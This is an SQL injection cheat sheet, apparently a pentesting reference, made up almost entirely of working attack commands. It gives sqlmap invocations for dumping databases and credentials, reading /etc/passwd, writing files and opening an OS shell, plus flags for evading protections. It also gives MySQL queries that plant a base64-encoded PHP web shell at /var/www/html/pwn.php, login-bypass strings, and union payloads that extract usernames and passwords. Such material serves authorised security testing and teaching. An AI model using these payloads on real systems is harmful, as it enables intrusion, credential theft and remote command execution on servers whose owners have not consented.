
SQLi

SQLMap

Tips

  • Copy the request as cURL in the devtools and change curl to sqlmap
  • Save burp requests to text files and load them in sqlmap with sqlmap -r request.txt

Don't ask for user input

sqlmap ... --batch

Fingerprint

sqlmap ... --current-user --banner --current-db --is-dba

Enum everything at once

sqlmap ... --all --batch -v 0

Enum schema

sqlmap ... --schema

Enum dbs

sqlmap ... --dbs

Enum tables

sqlmap ... -D dbname --tables

Enum columns

sqlmap ... -D dbname -T users --columns

Search table by string

sqlmap ... --search -T something

Search column by string

sqlmap ... --search -C something

Dump everything

sqlmap ... --dump-all

Dump table contents

sqlmap ... --dump -D dbname -T users -C email,password

Dump w/ filters

sqlmap ... --dump -D dbname -T users --where="email LIKE '%something%'" --start=1 --stop=15

Read file

sqlmap ... --file-read "/etc/passwd"

Write file

sqlmap ... --file-write "file-to-write.txt" --file-dest "/target/destination/on/victim/file-to-write.txt"

OS shell

sqlmap ... --os-shell

Send traffic through proxy

sqlmap ... --proxy http://127.0.0.1:8080

Save traffic to file

sqlmap ... -t ./out.txt

Verbosity

Show errors

sqlmap ... --parse-errors

Verbose output

# No info logs
sqlmap ... -v 0
# All payloads
sqlmap ... -v 3

Tuning

sqlmap ... --level=5 --risk=3
sqlmap ... --union-cols=6 --union-char='A'
sqlmap ... --prefix="\`)" --suffix="-- +" 

Bypass protections

Randomize user agent

sqlmap ... --random-agent

CSRF token

sqlmap ... --data="...csrftoken=7c65966e-4a4a-408a-bd92-fe2a3a9ee094" --csrf-token="csrftoken"

Randomize value

sqlmap ... --randomize=some-field

Tamper scripts

sqlmap --list-tampers
sqlmap ... --tamper=space2comment,between

Mysql

Fingerprint

select @@version
select sleep(3)

Enum dbs

select schema_name from information_schema.schemata

Enum tables

select table_name,table_schema from information_schema.tables where table_schema='zzz'

Enum columns

select column_name,table_name from information_schema.columns where table_name='zzz' and table_schema='zzz'

Enum current user

select user();

Enum current user privileges

select grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'<user>'@'<host>'"

Enum current user write file

An empty value means file access is permitted, whereas NULL means it is disabled.

select variable_name,variable_value from information_schema.global_variables where variable_name='secure_file_priv'

Read file

select readfile('/etc/passwd')

Write file

select from_base64("PD9waHAgc3lzdGVtKCRfUkVRVUVTVFswXSk7ID8+") into outfile '/var/www/html/pwn.php'

Login bypass

' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+

Some union injection examples

' union select 1,username,password,4,5,6 from db1.users;-- -
' union select 1,user(),3,4,5,6;-- -
' union select 1,sleep(3),3,4,5,6;-- -
' union select 1,readfile("/etc/passwd"),3,4,5,6;-- -